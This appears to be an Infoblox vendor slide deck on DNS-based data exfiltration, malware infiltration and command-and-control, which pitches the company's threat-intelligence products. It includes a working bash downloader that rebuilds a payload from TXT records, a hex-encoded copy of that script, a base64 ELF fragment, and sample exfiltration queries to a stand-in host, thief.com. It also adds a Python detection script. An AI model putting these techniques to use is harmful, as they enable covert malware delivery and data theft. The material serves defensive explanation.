Infoblox Cybersecurity Strategy and HighWay 53
400+ VENDORS
© 2016 Infoblox Inc. All Rights Reserved.
Security is Disconnected
Incident Response Challenges
Operational Challenges
Network and Security – Separate Teams with Different Priorities
Network team vs. security team. The problems this causes:
• Wastes resources for security and
Gartner’s View on Silos
Silos between network, edge, endpoint and data
DNS: The Malware Control Plane
DNS – Leading Culprit for Data Exfiltration
One Byte is Too Much
$3.8M: average consolidated cost of a data breach¹
46%: share of survey respondents that experienced DNS data exfiltration²
45%: share of survey respondents that experienced DNS tunneling²
1. Source: Ponemon Institute, 2015 Cost of Data Breach Study
2. Source: SC Magazine, Dec 2014, “DNS attacks putting organizations at risk, survey finds”
APT/Malware Proliferation Rooted in DNS
Easy to Let In, Tough to Get Out
91%: of malware uses DNS to carry out campaigns¹
431M: new unique pieces of malware in 2015²
#1: Malware C&C is the #1 responsible vector for crimeware³
• Intruders rely on DNS to infect devices, propagate malware and exfiltrate data
• Malware is designed to spread, morph and hide within your IT infrastructure
• The longer it takes to discover, the higher the cost of damage
1. Source: Cisco 2016 Annual Security Report
2. Source: Symantec 2016 Internet Security Threat Report
3. Source: Verizon 2016 Data Breach Investigations Report
DNS is a top attack vector
DNS is vulnerable to attacks and exploitations
Chart (Cloudmark 2014 report): two pie charts. “Exfiltration”: DNS 76%, with HTTP, FTP and Other sharing the remaining 9%, 8% and 7%. “DoS Attacks”: DNS 45%, HTTP 40%, NTP 11%, Other 4%.
Malware Exploiting DNS
• Over 91% of malware uses DNS
̶ To gain command and control
̶ To exfiltrate data
̶ To redirect traffic
• Despite adversaries’ reliance on DNS, 68% of organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and impact all sizes and types of organizations
• Average total cost of a data breach: ~$3.8M USD
• The question isn’t if, but when you will be attacked, and how effectively you can respond
Exfiltrating Data via DNS Tunneling
• Uses DNS as a covert communication channel to bypass firewalls and detection
̶ Iodine
̶ OzymanDNS
̶ SplitBrain
̶ DNS2TCP
Diagram: a client-side tunnel program on the endpoint carries IP traffic inside DNS queries out to the Internet (“Slow DNS”)
Data Exfiltration over DNS
Diagram: a compromised endpoint encodes data into the query names it sends to a rogue DNS server; the data is then listed on the darknet and sold for Bitcoin.
Syslog:
+12f(2354ayqv1asdf7s6ex.thief.com
Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
nkjFYVW$%&(YBH$JKGHkjh.thief.com
Malware Infiltration over DNS
Diagram: the command and control server publishes the payload with a DDNS update into TXT records on a rogue DNS server; the endpoint queries for the TXT records to retrieve it.
TXT record content (base64-encoded ELF executable; “f0VMRg” decodes to the ELF magic bytes):
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"
DNS Infiltration = Malware code acquisition
Downloader Script:
    #!/bin/bash
    # Text returned by dig when a label has no record: used as the end-of-data marker
    error=';; connection timed out; no servers could be reached'
    i=0
    echo '' > output.b64
    while :
    do
        # Fetch TXT record i under the zone given as $1 and strip the quotes
        RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2`
        if [ "$RESP" = "$error" ];
        then
            echo "Timeout - done"
            break
        fi
        echo -ne $RESP >> output.b64
        echo $RESP
        i=$((i+1))
    done
    cat output.b64 | base64 -d > output
The same script, hex-encoded and carried in 4 TXT records:
23212f62696e2f62617368206572726f723d5c273b3b20636f6e6e656374696f6e2074696d6564206f75743b206e6f207365727665727320636f756c6420626520726561636865645c2720693d30206563686f205c275c273e206f75747075742e6236
34207768696c65203a20646f202020524553503d60646967202b73686f72742024692e243120545854207c20637574202d645c275c225c27202d662032602020206966205b205c2224524553505c22203d205c22246572726f725c22205d3b202020
7468656e20202020206563686f205c2254696d656f7574202d20646f6e655c222020202020627265616b20202066692020206563686f202d6e65202452455350203e3e206f75747075742e6236342020206563686f202452455350202020693d2428
28692b31292920646f6e6520636174206f75747075742e623634207c20626173653634202d64203e206f7574707574
DNS Exfiltration = Command and Control
Signaling and control responses with DNS:
hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
Security in Layers, What About DNS or GDPR?
DNS coverage? YES with Infoblox
Diagram: app offerings (Salesforce.com, Office 365, Workday – HR, SAP), Firewall/NGFW, IPS/IDS, your SIEM solution
• Centralized logging and reporting
Motion of Malware through Networks: “PIE”
APT/malware uses DNS at every stage
P (Penetration): query malicious domains and report to C&C
I (Infection): download malware to the infected host
E (Exfiltration): transport the data offsite
Diagram: every stage passes through the DNS server
Breaking the Security GAP:
ActiveTrust Service®
Diagram: Infoblox Threat Intelligence Data Exchange (TIDE), Cloud / On-Prem; Infoblox DNS Firewall; Infoblox Threat Insight; Infoblox Dossier
Active Trust – Threat Intelligence (Actionable!)
• “Feeds” only block access
̶ Cause of the problem is still there!
̶ Still require analysts to identify size, scope, severity
̶ Still require them to find and clean the device
• Local intelligence (context) allows you to start automating the analysis and mitigation
̶ It now becomes “Actionable Intelligence”
• Finally, there are many feeds
̶ Each specializes in something
̶ There is very little overlap
̶ As customers’ security capability matures, they use more and more
Diagram: ActiveTrust TIDE aggregates feeds (phishing, botnets, SPAM, IPs, URLs), the Infoblox Threat Intelligence Feed (Base Malware, Malware, Ransomware), user-defined and other-vendor feeds, and RPZ behaviors; the Infoblox DDI Platform adds local context (device IP address, device MAC address, device type, device host name, device lease history, logged-in user, device localization, device metadata); enforcement points include NAC, DLP, WAF, IPS, NGFW and FW.
Infoblox TIDE – External Threat Feeds
Solution Overview
Infoblox supplements ActiveTrust threat data with threat data from third-party sources by allowing that data to be managed from within Infoblox TIDE.
Benefits
1. Eliminate cost of onboarding additional third-party data
2. Maximize resources by giving back time to the security operations and threat intelligence team
Infoblox TIDE/Dossier IOC lookups
ActiveTrust® – Threat Intelligence Providers
Solution overview:
The Infoblox TIDE solution allows customers to send TIDE and Dossier lookup requests, enabling customers to break silos of security tools and facilitating effective protection for both the network and endpoint domains.
Benefits:
1. Visibility across both network and endpoint domains.
2. Remediation and policy actions enabling faster response to threats
Diagram: threat intelligence providers (SURBL, TIDE Marketplace, custom TI) supply phishing & malware URLs, spambot IPs and C&C & malware host/domain data; TIDE applies policy, governance & translation and serves IOC lookups in various file formats (XML, JSON, STIX, CSV).
How The Streaming DNS Threat Insight Works
Detects sophisticated data exfiltration techniques that don’t have well-known signatures (zero day)
1. Looks at TXT records, A, AAAA records
2. Detects presence of data using lexical and temporal analysis
3. Certain attributes add to a threat score, others subtract from it
4. Final score classifies a request as exfiltration or not
5. If exfiltration is found, automatically adds destinations to special internal RPZ feed
Diagram: the model combines Entropy, Size, Lexical Analysis, Frequency and N-Gram features
Solution Benefits
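As an added illustration of the scoring outlined in steps 1 to 5 (example code written for this page, not Infoblox's Threat Insight implementation and not from the original deck), the Python script below runs a simplified version of that pipeline over constructed resolver log lines. It scores each query name by payload length, Shannon entropy, a hex-only alphabet, counter-style labels and TXT record type, lets short dictionary-like labels subtract from the score, aggregates per client and zone with a frequency bonus for many distinct subdomains, and emits RPZ NXDOMAIN rules for the zones it flags. The query names reuse the thief.com examples from the exfiltration and C&C slides; the log line format, the weights and threshold, and the two-label zone heuristic are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log sample (not from the original deck): two clients
# doing ordinary lookups and one sending exfiltration-style names plus
# sequential TXT pulls to thief.com, the domain used on the slides.
SAMPLE_LOG = """\
10.1.2.3 query: www.example.com IN A
10.1.2.3 query: mail.example.com IN A
10.1.2.4 query: login.microsoftonline.com IN AAAA
10.1.2.9 query: +12f(2354ayqv1asdf7s6ex.thief.com IN A
10.1.2.9 query: Xc786asdf89xcbv897sadfjlw.thief.com IN A
10.1.2.9 query: fityhkjDR65eUGYbjkUY6756.thief.com IN A
10.1.2.9 query: nkjFYVW$%&(YBH$JKGHkjh.thief.com IN A
10.1.2.9 query: 6a75747465722d6d62702e6c6f63616c0a.thief.com IN A
10.1.2.9 query: 0.thief.com IN TXT
10.1.2.9 query: 1.thief.com IN TXT
10.1.2.9 query: 2.thief.com IN TXT
10.1.2.4 query: cdn.example.com IN A
"""

# Assumed log line shape: "<client> query: <qname> IN <qtype>".
LOG_RE = re.compile(r"^(?P<client>\S+) query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")


def parse_line(line):
    """Return (client, qname, qtype), or None when the line does not match."""
    m = LOG_RE.match(line.strip())
    return (m.group("client"), m.group("qname"), m.group("qtype")) if m else None


def shannon_entropy(s):
    """Bits per character: base64-like data approaches 6, hex cannot exceed 4."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname):
    """(zone, payload): the zone is assumed to be the last two labels because
    no public-suffix list is available offline; everything else is payload."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]).lower(), ".".join(labels[:-2])


def score_query(qname, qtype):
    """Step 3: per-query attributes that add to or subtract from the score."""
    _, payload = split_name(qname)
    score, reasons = 0.0, []
    if len(payload) > 20:                                       # size
        score += 2
        reasons.append("long payload")
    entropy = shannon_entropy(payload)
    if entropy > 3.5:                                           # entropy
        score += 2
        reasons.append("entropy %.2f" % entropy)
    if len(payload) >= 16 and HEX_RE.match(payload.lower()):    # lexical: hex alphabet
        score += 2
        reasons.append("hex-encoded label")
    if payload.isdigit():                                       # lexical: counter label
        score += 1
        reasons.append("numeric counter label")
    if qtype == "TXT":                                          # record type
        score += 1
        reasons.append("TXT query")
    if payload.isalpha() and len(payload) <= 8:                 # subtracts
        score -= 2
        reasons.append("short alphabetic label")
    return score, reasons


def score_stream(lines, threshold=8.0):
    """Steps 2 and 4: aggregate per (client, zone) and classify. Returns
    {zone: {"client", "queries", "score"}} for zones at or over the threshold."""
    agg = defaultdict(lambda: {"queries": 0, "score": 0.0, "payloads": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qname, qtype = parsed
        zone, payload = split_name(qname)
        entry = agg[(client, zone)]
        entry["queries"] += 1
        entry["score"] += score_query(qname, qtype)[0]
        entry["payloads"].add(payload)
    flagged = {}
    for (client, zone), e in agg.items():
        total = e["score"]
        # Frequency: many queries with almost no repeated subdomains means each
        # name carries fresh data rather than being a cacheable lookup.
        if e["queries"] >= 5 and len(e["payloads"]) / e["queries"] > 0.9:
            total += 2
        if total >= threshold:
            flagged[zone] = {"client": client, "queries": e["queries"], "score": total}
    return flagged


def rpz_records(flagged):
    """Step 5: RPZ rules that return NXDOMAIN for each flagged zone."""
    records = []
    for zone in sorted(flagged):
        records.append("%s CNAME ." % zone)
        records.append("*.%s CNAME ." % zone)
    return records


if __name__ == "__main__":
    hits = score_stream(SAMPLE_LOG.splitlines())
    for zone, info in hits.items():
        print("exfiltration suspected: %s from %s (%d queries, score %.1f)"
              % (zone, info["client"], info["queries"], info["score"]))
    print("\n".join(rpz_records(hits)))
```

The hex-encoded label from the `hostname | xxd -p` slide scores below the entropy threshold because a 16-symbol alphabet caps entropy at 4 bits per character, which is why the alphabet check is a separate attribute rather than folded into entropy. A production scorer would replace the last-two-labels assumption with a public-suffix list and tune the weights against the organization's own query baseline.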
Easing Operational Challenges
What Infoblox can provide…
Supporting the ecosystem…
The DDI Data Gold Mine
DHCP: Device Audit Trail and Fingerprinting
A DHCP assignment signals the insertion of a device on to the network
• Includes context: device info, MAC, lease history
• DHCP is an audit trail of devices on the network
• Context for accurate risk assessment and event prioritization
IPAM: Application and Business Context
Fixed IP addresses are typically assigned to high value devices:
• Data center servers, network devices, etc.
• IPAM provides “metadata” via Extended Attributes: owner, app, security level, location, ticket number
DNS: Activity Audit Trail
DNS query data provides a “client-centric” record of activity
• Includes internal activity inside the security perimeter
• Includes BYOD and IoT devices
• This provides an excellent basis to profile device & user activity
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
What IP? DHCP Service / Discovery
When did it appear? Allocate / Discovery / Cloud
Which MAC? DHCP or Discovery
Device type? DHCP Fingerprint
DNS hostname? DNS + DDNS updates
User behind it? AD user Identity Mapping
Where is it? Network Insight / Cloud IPAM
ONE SHOT: What has happened in the past? IP, user, hostname, RPZ, lease… Ecosystem activity? Tracking history?
Application and Business Context
IPAM: “metadata” via Extended Attributes: owner, app, security level, location, ticket number
How can Infoblox Help You Get There
Infoblox Actionable Network Intelligence Delivers Control and Security from the Core
Iberia
Sales: Joaquín Gómez, jgomez@infoblox.com, +34 670 499 348
Pre-sales: Jose Canelada, jcanelada@infoblox.com, +34 678 534 519
Q&A
Thank you very much
Questions?